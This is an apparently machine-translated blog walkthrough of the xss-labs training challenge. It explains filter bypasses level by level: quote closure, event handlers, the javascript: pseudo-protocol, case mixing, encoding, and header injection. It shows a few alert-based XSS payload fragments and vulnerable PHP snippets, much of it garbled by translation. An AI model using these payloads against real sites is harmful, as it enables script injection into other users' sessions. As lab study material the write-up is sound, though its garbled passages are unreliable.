XSS labs clearance challenge


XSS labs clearance challenge

0x00 xss-labs

I’ve been watching XSS recently. Today I’ll do XSS labs pass the challenge. After looking for the source code for a long time, I finally found it. Because everyone knows the download speed on GitHub, I directly transferred it to my code cloud and posted it here. You are welcome to download and use it.

  Please click the source code link: https://gitee.com/ruoli-s/xss-labs

  there’s nothing to say about installation. Put it directly into the built onewwwUnder the directory, you can start to break through. There are XSS labslevel 20, do it.

  (actually, I think these pictures are the biggest reason why I really want to be an XSS challengeimg)


0x01 level 1 no filtering mechanism


  after watching for a long time, the original parameters areURLIt’s in the car,


   after modifying the parameters, the page also changes. Right click to view the source code and find that there is a problem of jumping to level 2JS, and the parameters we pass in are several bits. The length of payload is shown below.


OK, go directly to the code:



0x02 leval 2 closed label


  we directly enter the value of level 1payload, it is found that the output is direct. Here, the entity escape should be done.


  F12View front end code:


    the first is the code displayed on the page, and the second is the code we entered. Here we should escape. We construct payload and use">Attempt to closeinputlabel:



0x03 Leval 3 Single quote closure+htmlspecialchar()function


When we come to leval 3, we still use the payload tested in the previous two levels to verify:


It is found that all are escaped by entities. Let’s look at the source code:

No results found related to '. Htmlspecialchars ($STR).'



  cough, double quotation marks foundRestrictions were made, but single quotes were released'And it’s added herehtmlspecialcharsFunction, in which case we canEvent tagTrigger form execution. Here we begin to construct the payload:



It can be seen that the event does not pop up immediately after submission. Here, we also need to move the mouse to the text box to trigger the event.



  Htmlspecialchars function

  HTML event properties

0x04 leval 4 double quotation mark closing + add event


We are still the same. We will go through the previous tests one by one. Of course, the result must be failure. Next, let’s look at the whole end code:


  source code pairs can be found>and<After filtering, let’s look at the source code:

$str3=str_ Replace ("no results found related to". Htmlspecialchars ($STR). "."


  actually usestr_replace()yesAngle bracketFiltered, and single quotes'Therefore, we directly imitate the previous question and use HTML events to construct a payload:



Here is also a successful pass.

0x05 leval 5 JavaScript pseudo protocol


Finally, we came to the fifth level. We tested it in the previous way. There was no doubt that it failed, but we found some other things:


  looks likeonIt’s been tampered with, and we’re going onoAfter entering others, it is found that onlyonReplaced, which meanseventIt doesn’t work.


  continue to try to find< / code > has also been replaced < code > < SCR_ ipt></code>,</p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116151044701.png" alt="image-20210116151044701" loading="lazy"></p>
<p>    I'm sure everyone has thought of it here. Let's try to mix case and case:</p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116151747433.png" alt="image-20210116151747433" loading="lazy"></p>
<p>                     </ p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116151900058.png" alt="image-20210116151900058" loading="lazy"></p>
<p>   continue to try to see if it can be closed. We enter < code > '< / code >, < code > "< / code >, < code > < / code >, < code > > < / code >, < code > \ < / code >, and find that only < code >' < / code > is escaped by entities. That should be to use < code >" < / code > to construct closure:</p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116151535724.png" alt="image-20210116151535724" loading="lazy"></p>
<p>  OK, we've tried everything we should try. Next, let's try the < code > pseudo protocol < / code >:</p>
<p>  <a href=" https://www.html.cn/qa/javascript/11155.html "Target =" _blank "> to see the of JavaScript pseudo protocol, please click here</a></p>
<pre><code><code>"><a href=javascript:alert(/xss/)>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116153331190.png" alt="image-20210116153331190" loading="lazy"></p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116153501066.png" alt="image-20210116153501066" loading="lazy"></p>
<p>   finally, we passed the test successfully. Of course, it's more practical to look at the source code:</p>
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
Echo "< H2 align = center > no results related to". Htmlspecialchars ($STR). "< / H2 >". '< center >
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
< input type = submit name = submit value = search / >
<p>    as we guessed, we replaced < code > on < / code > and < code > < script > < / code > respectively, and also made < code > case filtering < / code >. All right, go on to the next level, ori</ p>
< H4 id = "0x06-leval-6-case bypass" > 0x06 leval 6 case bypass < / H4 >
<p>  we have successfully reached the 6th level. We are walking forward</ p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116154828872.png" alt="image-20210116154828872" loading="lazy"></p>
<p>   let's test the payload directly. Of course, don't think about it. It must not work. Let's look at the front-end code directly. Ouch, I found something. This time, even < code > href < / code > has been filtered. It's a cruel man</ p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116183918429.png" alt="image-20210116183918429" loading="lazy"></p>
<p>    we also tested < code > on < / code >, < code > < script > < / code >, and found that the filtered ones are plain and clear, and the single quotation marks < code > '< / code > are also escaped by entities, but we also found other things. It seems that we don't care about case, huh</ p>
<p><img src="https://gitee.com/ruoli-s/cloudimage/raw/master/img/image-20210116185419800.png" alt="image-20210116185419800" loading="lazy"></p>
<p>   we use double quotation marks < code > "> < / code > to construct closure directly by case:</p>


Here is also a successful pass. Go on, go on!!!

0x07 leval 7 double write bypass

   come to the seventh level. Well, this picture is good. It’s magical. Do you have it?XSS labs clearance challenge


No more nonsense. Let’s start with a wave. It’s still useful to find something? (●’◡’●)。


  discovery imagescriptThis keyword is filtered, isn’t itDouble write? We use double quotation marks directly"Closed structure payload:



Easy, next.

0x08 leval 8 code bypass

Come to the eighth level, nothing.


  when testing the payload, you can see that the previously tested are basically filtered and the case is stuck. However, we found that the front-end code is directly constructedLabel, in that case, we might as well trycode, see if you can bypass:


Here, the author has tested that both HTML entity coding and hex coding can be bypassed. I’ll just put hex coding. See that most blogs are HTML entity coding. Those who are not familiar with it can understand it by themselves.

  we can see that the code conversion mechanism is toscriptMediumriBecomer_i, so we just coderanditry:

letter decimal system Hex (HEX)
r r r
i i i

  Please click here for the coding link

Construct payload:



Well done, next level.

0x09 leval 9 detection keyword

The more you look at these pictures, the more you like them. According to the Convention, we’d better make some noise first.


I’ll go. I’ve tried everything I should try. What does this code give? What about the payload we entered??



No, wait for me to check the source code:

  echo 'Links';

                     Strpos function, everyone will obey you. This function means that there must be in the string we enterhttp://Character, I vomited. Who can think of it:

  want to know more about the strpos functionPlease click here

We can see that the code is not filtered here, so we continue to use the payload in the above question:



Cough, this question is very inhumane. Next, it’s nothing.

0x10 leval 10 hidden information

After thousands of hardships, finally came to the half of the whole challenge, sobbing.


Puff, puff, spit again. I tried everything. Why did Mao run to the URL link again? Look at the code, god horse didn’t get it, but what’s a form? Still not displayed on the page?


No way, go and see the source code. Hey, my heart is broken

$str33=str_ Replace ("no results found related to". Htmlspecialchars ($STR). "."


  did you find it? feelingkeywordParameters are just a puzzle. What really works ist_sortParameter, but there is a problem with itstypeType ishidden, we have to change the front end totextType, let it appear, and the background is only for<>After filtering, we can use events to construct:




be careful: be sure to modify it at the front end2 timesType to complete the pop-up window.

0x11 Leval 11 Referer


We came to level 11, because it is basically impossible to be so simple after level 10, so we don’t need to guess and waste time. We can directly look at the front-end code and detect it. We can’t do it. We can only look at the source code.


  you can see that, similar to the tenth level, there are hidden forms. Just one moret_refParameter, I just don’t know whether it is passed. Let’s try to use the method of the previous level, starting with the label.

Construction Code:


View page code:


  you can seet_sortWe still accept parameters. Let’s look at the source code directly!!

$str33=str_ Replace ("no results found related to". Htmlspecialchars ($STR). "."


  found one more$str11=$_SERVER['HTTP_REFERER']Field, and we know that http_ Reference is to obtain the referer field in the HTTP request, that is, from which page we came to the current page. We can useHackbarMake modificationsRefererField.


  check the web page code and find that the passed in referer value is changedt_refGot it.


Next, we can try to construct code and break through from referer:

" type="text


View page code:


Finally, click the text box:


0x12 Leval 12 User-agent

It seems more and more difficult. Even the picture began to cry. Sang Xin / (ㄒ o ㄒ)/~~


Let’s just look at the web Code:


Did anyone find that the value introduced this time looks so familiar? (● ‘◡ ●), if not, let’s look at the following figure:


Ha ha, is as like as two peas? Then there’s the idea. Let’s start directly fromUser-agentStart with and construct the code:

user-agent" type="text


Finally, let’s check the web page code:


OK, here we also pass directly.



When we came to level 13, we didn’t know where they started, so we went directly to the web Code:


As you can see, another parameter is addedt_cook, I guess it may be a cookie. Let’s try the code directly:

Cookie" type="text



You can see that the cookie field we added in hackbar was not successfully passed in.

  then we can only grab a bag and have a look. It’s time to open our dusty bagBurp SuiteYes. Through packet capturing, we can see that there is one more parameteruserIt turns out that the value of the cookie is passed in through the user. Helpless (╯▽) ╭


Now that we know the key to parameter passing, we can construct the code:

Cookie" type="text


We passRepeaterWhen the module sees that the parameters have been passed in, release the package to see our harvest.



OK, the 13th pass passed smoothly. continue

0x14 Leval 14 Exif


Is this a thing?? What about the picture? Wait, it seems to jump, but Xiaobian doesn’t seem to live that long. Wait, ha, I can’t brush it out all the time (the key is that I can’t open the ladder, so I resolutely give up looking at the answer)····


  I checked the Internet and said what EXIF XSS is. Well, I only knowCTFThe one in charge of steganography in miscellaneous items in has hidden information in EXIF (anyway, Xiaobian hasn’t encountered such a simple steganography problem), and then go to Baidu


Well, let’s see

0x15 Leval ng-include


At first, I looked around, but I didn’t find anything. Finally, I found that the parameters in the URL are displayed in the web source code. I think there may be some moths.


  I looked at the web page source code again and found that there was indeed ang-include, I don’t know what it is…


  finally, I went to Baidu and said whatng-includeyesangular jsI don’t know much about the things in PHP, but it seems to be similar to the include function in PHP, which includes a file.

  speaking of this, let’s have a lookng-includeUsage of:

1. The ng include directive is used to include external HTML files.

2. The contained content will be the child node of the specified element.

3. The value of the ng include attribute can be an expression that returns a file name.

4. By default, the included files need to be included under the same domain name.

It is worth noting that:

  1. Ng include. If you specify an address only, you must use quotation marks

  2. Ng include: external html is loaded, and the content in the script tag is not executed

  3. Ng include, load the style tag in the external HTML, and the style can be recognized

Take another look at the source code:

window.alert = function()  
Confirm ("well done!");

Welcome to level 15

Welcome to level 15. Find a way to go out!


  you can see here throughsrcPass on parameters, and it’s right<>After filtering, since HTML files can be included here, that is, files with XSS vulnerabilities that we have done before can also be included, so we can construct:




OK, the window pops up successfully. Next, the people who do these two levels are uncomfortable.

0x16leval 16 space entity escape


After testing, it is found that parameters are passed in the URL. Let’s try the simplest way:


  discoveryscriptThe words are filtered directly, even/scriptAlso filtered out, then try the payload off:

Er, it seems that the space has been by the entity:


  well, now we can only use other instead of spaces. The first thought isenter, as follows: in HTML, carriage return can replace spaces.

  last useURL encodingConvert carriage return to%0aSubstitute:

OK, OK, pop up successfully.


  by the way, look at the source code: sure enough, all are used Entity replaced.


0x17 leval parameter splicing


   emmm, there is no picture again. Hey, I casually passed a few parameters and found that it is based onarg01andarg02Two parameters are accepted. After parameters are passed, two parameters areSplicing, can we use events directly to trigger?


Er, it seems that there is no response, but we can see that there are events that can be triggered. It’s strange.


  I went to ask Du Niang. They said it was loaded hereswfPictures, but unfortunately, ourfirefoxI can’t get out directly. Woo woo, change Google, wipe,flashIt’s shielded, but the pop-up window can still come out:


  changed againStar wish, finally come out, woo woo


   by the way, look at the source code. It seems to be similar to what we think, through twoargPass parameters and filter<>


0x18 leval parameter splicing

  Er, at first I thought there was no picture again. When I saw the web page code, there was another oneswf, well, change the browser decisively.


Poof, what’s this? Flickering is not like this,


Directly use the payload of the previous level:


Poof poof, that’s OK. Just play it? I don’t understand, let’s go!!


0x19 Leval 19 Flash xss


  first try the payload: OK, it seems to be used"Closed, but after closing, because there arehtmlspecialchars()The function is filtered here, so it can’t be closed.


  I can’t help it. I went to see the answer and said what it wasflashofDecompile, OK, anyway, I don’t understand. If you are interested, you can have a look. You can’t chew it down at present. When the time is ripe, write it alone and put an answer first.



  what you want to study in depth:Click here

0x20 Leval 20 Flash xss


Well, it should be a white flash, or stick an answer first: in detail, wait until you can calm down.



Recommended Today

The real problem of Alibaba IOS algorithm can’t hang up this time

More and more IOS developers continue to enter the peak of job hopping in 2020 Three main trends of interview in 2020: IOS bottom layer, algorithm, data structure and audio and video development Occupied the main battlefield. Data structure and algorithm interview, especially figure, has become the main reason for the failure of most first-line […]